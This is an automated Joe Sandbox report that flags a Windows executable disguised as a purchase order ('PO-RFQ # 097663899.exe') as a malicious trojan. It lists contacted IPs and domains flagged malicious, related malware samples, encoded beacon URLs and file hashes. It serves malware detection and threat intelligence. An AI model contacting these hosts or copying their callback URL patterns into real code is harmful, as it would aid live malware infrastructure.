                                                                  http://www.goodfont.co.krPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssPO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    http://www.carterandcone.comlPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sajatypeworks.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.typography.netDPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.founder.com.cn/cn/cThePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/staff/dennis.htmPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://fontfabrik.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.founder.com.cn/cnPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers/frere-jones.htmlPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.jiyu-kobo.co.jp/PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.galapagosdesign.com/DPleasePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://www.gnu.orgPO-RFQ # 097663899.exefalse
                                                                          high
                                                                          http://www.fontbureau.com/designers8PO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.fonts.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              http://www.sandoll.co.krPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.urwpp.deDPleasePO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.zhongyicts.com.cnPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-RFQ # 097663899.exe, 00000000.00000002.251630889.000000000307C000.00000004.00000001.sdmp, PO-RFQ # 097663899.exe, 00000000.00000002.251568438.0000000003061000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.comPO-RFQ # 097663899.exe, 00000000.00000002.258248209.0000000006FE2000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.280706639.000000000BC30000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                198.54.117.218
                                                                                parkingpage.namecheap.comUnited States
                                                                                22612NAMECHEAP-NETUSfalse
                                                                                209.99.40.222
                                                                                www.agarkovsport.onlineUnited States
                                                                                40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                185.107.56.197
                                                                                www.aquaroyaume.comNetherlands
                                                                                43350NFORCENLtrue
                                                                                212.237.249.116
                                                                                www.farmacyfastfood.comDenmark
                                                                                48854ZITCOMDKtrue
                                                                                160.153.136.3
                                                                                bigbuddyco.comUnited States
                                                                                21501GODADDY-AMSDEtrue
                                                                                34.102.136.180
                                                                                salesenablementlaunch.comUnited States
                                                                                15169GOOGLEUSfalse
                                                                                103.253.212.249
                                                                                kopebitest.comIndonesia
                                                                                58487RUMAHWEB-AS-IDRumahwebIndonesiaCVIDtrue
                                                                                94.136.40.51
                                                                                www.globalperfumery.comUnited Kingdom
                                                                                20738GD-EMEA-DC-LD5GBtrue

                                                                                General Information

                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                Analysis ID:383978
                                                                                Start date:08.04.2021
                                                                                Start time:13:31:42
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 10m 55s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:light
                                                                                Sample file name:PO-RFQ # 097663899.exe
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                Number of analysed new started processes analysed:29
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:1
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • HDC enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@7/1@14/8
                                                                                EGA Information:Failed
                                                                                HDC Information:
                                                                                • Successful, ratio: 9.9% (good quality ratio 8.9%)
                                                                                • Quality average: 71.9%
                                                                                • Quality standard deviation: 31.4%
                                                                                HCA Information:
                                                                                • Successful, ratio: 100%
                                                                                • Number of executed functions: 0
                                                                                • Number of non-executed functions: 0
                                                                                Cookbook Comments:
                                                                                • Adjust boot time
                                                                                • Enable AMSI
                                                                                • Found application associated with file extension: .exe
                                                                                Warnings:
                                                                                Show All
                                                                                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.209.183, 40.88.32.150, 52.147.198.201, 168.61.161.212, 23.54.113.53, 13.64.90.137, 52.255.188.83, 95.100.54.203, 20.82.210.154, 23.10.249.26, 23.10.249.43, 23.0.174.200, 23.0.174.185, 20.54.26.129
                                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                TimeTypeDescription
                                                                                13:32:39API Interceptor1x Sleep call for process: PO-RFQ # 097663899.exe modified

                                                                                Joe Sandbox View / Context

                                                                                IPs

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                198.54.117.218Betaling_advies.exeGet hashmaliciousBrowse
                                                                                • www.thenewyorker.computer/hw6d/?DnbLu=Y1unV92ZJUSuuBS+wJtUBQ3HA2/A73jU4dZUG/XKFhicVa7REK6SIV0eE0B/9G03nb8G&EzuxZl=3fX4qpLxXJu
                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                • www.enerav.com/c22b/?t8bHuTK=aEhNz1M5MwONSiBn/0vn4w/gCXHJ6jEF3X3HXryAuETgC+Myn95z7x6eSB6DSHN4Cngq&2d=lnvt
                                                                                46578-TR.exeGet hashmaliciousBrowse
                                                                                • www.kevinrsamuels.network/goei/?kfOdRJ=f9uvcKoleaXhAa+Mtcg3NtpkL3OawIA7ZGyED81dVKF6dE9d54Zy+1duc26jKxOfhZ46&jBZx=D8b4q
                                                                                SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                                • www.thehairtransplantliaison.com/qqeq/?UR-TRLn=46HGiVXtvGZ1o457vCIWGWOD0rk7gPAg1COzf9/s39+Y4ChpogYwPMQ24i1sYB9XjSps&P6u=Hb9l0TTXQ4NLhX
                                                                                Swift001_jpg.exeGet hashmaliciousBrowse
                                                                                • www.switcheo.finance/o9st/?KtClV=KhNCudCuas36niPBRfSjyKEtMLkkXOZQHLO8g5q+wgMU/BVTe4XuEXQf7/wtYyCblVuW&t8rL=FrghEXS
                                                                                Payment_png.exeGet hashmaliciousBrowse
                                                                                • www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp
                                                                                9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                                • www.thesixteenthround.net/aqu2/?5j=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7&_P=2dhtaH9
                                                                                Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                • www.boogerstv.com/p2io/?n8Ehjz3=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&JtxH=XPs0s4JPf
                                                                                27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                • www.boogerstv.com/p2io/?RR=YrKhZvg&rp=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM
                                                                                Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                                                                • www.mondopeak.com/m8es/?dL3pv=B53Wf6M3JDAEan34e2a23JkFEJLcYp8ycOdfYrTy6dbNslo5+k2oC0PjjJDWZV/24+RN&BlL=8pdpXZ1po
                                                                                Fully Executed Contract.xlsxGet hashmaliciousBrowse
                                                                                • www.successandjoy.club/3ueg/?cFN=ErmXmMBIFtdewFC6O29iVXifVtX5lbM9ZC7kz+NOoNf32Keeuvv655T9v66BJ70e0flOVQ==&PBU=dpg8g
                                                                                Inv.exeGet hashmaliciousBrowse
                                                                                • www.a-zsolutionsllc.com/hko6/?NVxxVPJ=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXOfKoyPZ21p&Ch6LF=9rj0axC
                                                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                • www.washabsorber.com/gypo/?UrjPuprX=Pn910w3l5D7RPWGrIfEjN0rd6RS+9oh5xbf6ZpHI5T1fuoOy87qGtS6g2RMAOlxWqznzEw==&nnLx=UBZp3XKPefjxdB
                                                                                zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                                                • www.mediasupernova.com/idir/?zZ0lQ0=BBXoJm4OTOHApCp3fGSy0sEyLibn+67cOqzoDset7FTIXfnJGeAyh+7pO3MSwT6mb2mV&Wzr=H2MDx8O8kJn8f
                                                                                InterTech_Inquiry.exeGet hashmaliciousBrowse
                                                                                • www.chelseybalassi.com/pkfa/?UjRXl6T=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KB5y+kqtClQ&tVEp=1b60ITOxXh8hrzep
                                                                                00278943.xlsxGet hashmaliciousBrowse
                                                                                • www.coffreauxtissus.com/tmz/?Xrx4qhO=p1AOeEel+iKfzrJrX3ku4fFInusX5uqiRYnKoS72OyvSgvmqycsVhhJV/aISDmeQLKXuHQ==&dny8V=8p-t_j0XJnOLab
                                                                                insz.exeGet hashmaliciousBrowse
                                                                                • www.a-zsolutionsllc.com/hko6/?sDHh4=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p&Wr=M4nHMf1xX
                                                                                Invoice Payment Details.exeGet hashmaliciousBrowse
                                                                                • www.angermgmtathome.com/kio8/?PR-Hfnn=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHzLrSTP9HxKs&Cd8t=9rJx809H6RL0Cr7
                                                                                order.exeGet hashmaliciousBrowse
                                                                                • www.a-zsolutionsllc.com/hko6/?X2Mt66Xx=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGUiPWZu0eDc4L90DGg==&bly=TVThefOpdDy0
                                                                                Z4bamJ91oo.exeGet hashmaliciousBrowse
                                                                                • www.swavhca.com/jskg/?inKP_TF0=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLAzU62aITRdq&oneha=xPMpsZU8

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                parkingpage.namecheap.comBetaling_advies.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.211
                                                                                eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.212
                                                                                46578-TR.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.217
                                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                BL-2010403L.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.212
                                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.217
                                                                                INV-210318L.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.212
                                                                                Inquiry.docxGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                BL Draft copy.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                Order.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.210
                                                                                PO.1183.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.211
                                                                                TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.216

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                NAMECHEAP-NETUSBetaling_advies.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                nova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                                                                • 63.250.37.200
                                                                                gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.211
                                                                                Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                                • 63.250.43.5
                                                                                eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.244
                                                                                000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                                                                • 198.54.126.159
                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                quotation.exeGet hashmaliciousBrowse
                                                                                • 162.0.229.227
                                                                                PU Request Form Hardware.exeGet hashmaliciousBrowse
                                                                                • 198.54.126.165
                                                                                URGENT INQUIRY.exeGet hashmaliciousBrowse
                                                                                • 198.54.126.165
                                                                                8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                • 63.250.38.60
                                                                                8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                • 63.250.38.60
                                                                                8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                • 63.250.38.60
                                                                                Protected Client.jsGet hashmaliciousBrowse
                                                                                • 199.192.24.250
                                                                                one new parcel.exeGet hashmaliciousBrowse
                                                                                • 199.193.7.228
                                                                                Protected Client.jsGet hashmaliciousBrowse
                                                                                • 199.192.24.250
                                                                                LIHUA Technology HK Order Items.exeGet hashmaliciousBrowse
                                                                                • 198.54.114.191
                                                                                CONFLUENCE-NETWORK-INCVGinvoice.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                PO7321.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.39
                                                                                PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                                • 208.91.197.39
                                                                                Lista e porosive te blerjes.exeGet hashmaliciousBrowse
                                                                                • 209.99.64.33
                                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                Formbook.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                bank details.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                PO#7689.zip.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                ORDER_PDF.exeGet hashmaliciousBrowse
                                                                                • 209.99.64.18
                                                                                deIt7iuD1y.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                                • 209.99.64.55
                                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.39
                                                                                products order pdf.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                NFORCENLf1uK8cmWpt.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                JmtlihbjqE.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                GMLce4kiLh.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                lbL6XqqqM3.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                ju3KXnbV9b.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                ofBzBALmBi.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                • 212.8.251.227
                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                • 212.8.251.227
                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                • 212.8.251.227
                                                                                HPxf4UoX7Q.dllGet hashmaliciousBrowse
                                                                                • 151.236.14.53
                                                                                TaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                • 109.201.133.100
                                                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                                                • 185.107.56.199
                                                                                4TYyYEdhtj.exeGet hashmaliciousBrowse
                                                                                • 185.107.56.199
                                                                                z9HUN5vQSa.exeGet hashmaliciousBrowse
                                                                                • 185.107.56.58
                                                                                vipkSebxBp.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                sFpD20j0Xq.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                2HJ7qBzK1k.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                TJ6N6h5kft.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                6ed9XIsV3s.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                aagLWro144.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-RFQ # 097663899.exe.log
                                                                                Process:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1314
                                                                                Entropy (8bit):5.350128552078965
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.8413755633297075
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:PO-RFQ # 097663899.exe
                                                                                File size:532480
                                                                                MD5:3a480d8d735efe129dcccea48a054721
                                                                                SHA1:444f3d7795694fb3fd462b6cf3f5c2776e4a1196
                                                                                SHA256:006dcd5baa67723c1d34336ca9d3eb55eb53cdb58999a8c6a3a64b28c2848220
                                                                                SHA512:665f468fd10cab796c277b3d5e9344b00f443f837010deb810e9da0e1265d8d3d997d9e60ae467916a8807818ac0a8c63d9c40d7e5c86c89d43961174c3b68c4
                                                                                SSDEEP:12288:bV7SVAcc+PHH+E1JhJKozcMZi+qEFUOMXR:x7SicLeE1wW+k4
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V6n`..............P..............2... ...@....@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:00828e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4832d2
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x606E3656 [Wed Apr 7 22:46:46 2021 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:v4.0.30319
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
